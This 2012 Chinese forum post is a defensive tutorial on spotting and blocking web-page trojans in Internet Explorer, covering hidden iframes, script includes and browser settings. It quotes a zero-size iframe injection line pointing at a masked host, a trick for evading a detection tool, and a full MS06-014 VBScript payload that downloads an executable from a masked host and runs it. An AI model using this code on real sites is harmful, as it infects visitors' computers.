反黑精英之入侵防御（二）

楼主^#

更多发布于：2012-02-01 16:27

[] 1


	从本文你可以学到： 1. 如何识别网页是否存在木马 2. 如何正确处理系统中IE漏洞二、防网页木马入侵大家看到这章标题的时候可能都这么想：“什么啊？网页木马入侵！那我们上网浏览网站（冲浪）的安全谁来保护我们啊，”对于这些顾虑你可以不用去想，因为你看完这部分文献你基本上就可以大胆的遨游internet(因特网)。下面我们用四个方法：第一种识别利用隐藏框架调用htm 、第二种识别利用重定向任何调用的htm、js、第三种防御网页木马我只用IE、第四种IE漏洞修补及意见；带你进入安全互联网时代Let GO! ⒈识别利用隐藏框架调用htm 利用隐藏框架链接到网页木马就是其实就是利用HTML网页语言，制作一个肉眼无法看到的一个框然后后台隐藏打开网页木马地址，从而执行了恶意代码（漏洞利用的代码）。我们简单分析一下这段常用的网页挂马代码把，懂HTML语言都应该清楚的：<iframe src=http://www.xxxx.com/muma.htm width=0 height=0></iframe> 其实就是一个宽和高都为0的框大家当然看不到了，从而达到后台隐藏打开含有恶意代码的网页（即网页木马）→种植后门→远程控制进行信息窃取或者进行磁盘文件破坏等一系列动作……。对于防范我们可以利用一款软件《网页木马防护器》。比如：我们想访问的网站为“http://www.atcpu.com/bbs” 在软件查看页面选项中输入地址即可查看到该网站的首页（即：主页）（如图1）可以看出我们现在访问的网站页面应该是正常的！现在我们看看不是正常的页面提示什么吧！（如图2）检查提示中显示：“网页有不可见窗体，有木马，小心！” 看到这个不用我说你们要做什么了吧。赶紧杀毒吧！（这款软件判断标准就是<iframe src=http:// width=0 height=0></iframe>符合就回提示有不可见窗体，软件缺陷就是也可以算是BUG <iframe src=http://www.xxxx.com/muma.htm width=1 height=1></iframe>改一下宽和高就检查不到了(如图3）弱智吧！关键时刻还是要靠自己……至于软件问题我就不想多说因为也不是我编写的，有能力的可以报告给作者叫他更新或者自己编写一个程序，这里我们继续用这款软件人工判断。）我们自行判断代码所要看的关键字是“<iframe src=http://任何地址（或/任何地址）width=0 height=0></iframe> winth= 0到10 之间height= 0 到10 之间，还要判断一定要在<iframe </iframe>之间才有效”代码可以在软件的<网页源代码> 中看到一般在网页的底端</html> 之前对于代码太多不好看的时候可以使用复制全部代码到任何一款文本编辑器中如：“记事本”然后用查找功能搜索关键字“<iframe”在进行代码判断！进行这个判断以后基本可以杜绝这类代码对您心爱的危害！图片：34_3710_53ef8a97a3aa777.png 图1 正在检查站点的默认主页图片：34_3710_607831985365997.png 图2 含有恶意代码的页面图片：34_3710_9de6627140f3ef2.png 图3 变异的恶意代码页面轻松躲避检查 ⒉识别利用重定向任何调用的htm、js 这类调用很难检查，不过使用率到现在还不是很高。《网页木马防护器》检查主页然后查看是否有这个代码？“<script language=javascript src=http://任意文件.js 或任意文件.js></script>”（如图4）这类检查难就难在这个调用JS的代码是正常的，不正常的恶意代码是在JS里而不是主页中。我们只有把这个JS下载下来检查（可以使用下载工具如迅雷，批量下载回来检查）……。JS文件中恶意代码代码特征和HTM主页特征基本一样，代码如下：“document.write("<iframe <iframe src=http://任何地址（或/任何地址）width=0 height=0></iframe>");”winth= 0到10 之间height= 0 到 10 之间，还要判断一定要在<iframe </iframe>之间才有效。图片：34_3710_8377c98a4d8a7e7.png 图4 正常调用JS行为对于连接到网页木马可以查看是否存在这些典型的代码： MS06014 网页木马的恶意代码：（网页木马代码远远不止这些其实还有很多不过都不能对IE6.0或者打过补丁的系统起作用！） <html> <script language="VBScript"> 调用VBScript脚本只要禁用这个脚本基本可以防好多网页木马了！ on error resume next dl = "http://www.*****.com/go.exe" 下载木马的地址 Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1;a2;a3;a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, dl, False x.Send fname1="g0ld.com" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0 </script> <head> <title>Oh,my god!</title> 提示给浏览者的信息，顶部标题栏显示。 </head><body> <center>You DO it!</center> 显示的文字信息 </body></html> 从上面代码我们可以看出网页基本是HTML静态页面，不过也不排除ASP版的网页木马。之前我们介绍的两种方法是防御联接网页木马的方法，也就是通常所说的“挂马”是很多小黑客经常使用的方法，但是如果是本身就是漏洞利用的恶意代码呢？我们不是……没法了？好我们现在我们进入防网页木马的方法吧！ ⒊防御网页木马我只用IE 这里以常用浏览器IE6.0版本来介绍方法：禁用脚本：打开IE的internet选项-->安全->自定义级别，往下翻找到脚本--java小程序，禁用即可。(如图5) 图片：34_3710_5a4850b44fa77ef.png 图5修改IE禁用javascript脚本当然也可以禁用VBScript就在脚本项目里面有几个全部选择禁用即可。最后单击一下[重置]即可生效最后单击确定退出。当然也可以直接把安全级别设成高就好了（如图5）。注：禁用了脚本会有很多想不到麻烦，因为绝大数网站都会用到的。如美化或者动画效果需要调用脚本才能实现。禁用(iframe)隐藏框架调用文件：方法基本和上面禁用脚本是一样的！（如图6）当然也可以直接把安全级别设成高就好了（如图5画圈圈处）图片：34_3710_c31072984f72305.png 图6 选项选禁用即可 ⒋IE漏洞修补及意见禁用脚本会导致浏览不正常或者页面出现很多不正常的问题不推荐使用！微软对于网页木马利用的IE漏洞都会发布相应的补丁我们只有即使补全以减小中招的可能！当然也可以使用非IE内核的浏览器如：Mozilla Firefox火狐浏览器（如图7）、Opera浏览器（如图8）等，不管用什么浏览器即时更新软件并做好软件缺陷的补丁安装是很有必要的！图片：34_3710_c736674e554a43a.png 图7 火狐浏览器截图图片：34_3710_9e36a31c67790ca.png 图8Opera浏览器截图本期小结：虽然网页木马很多但是我们只要掌握一些方法，我们还是可以将中招几率大大降低的！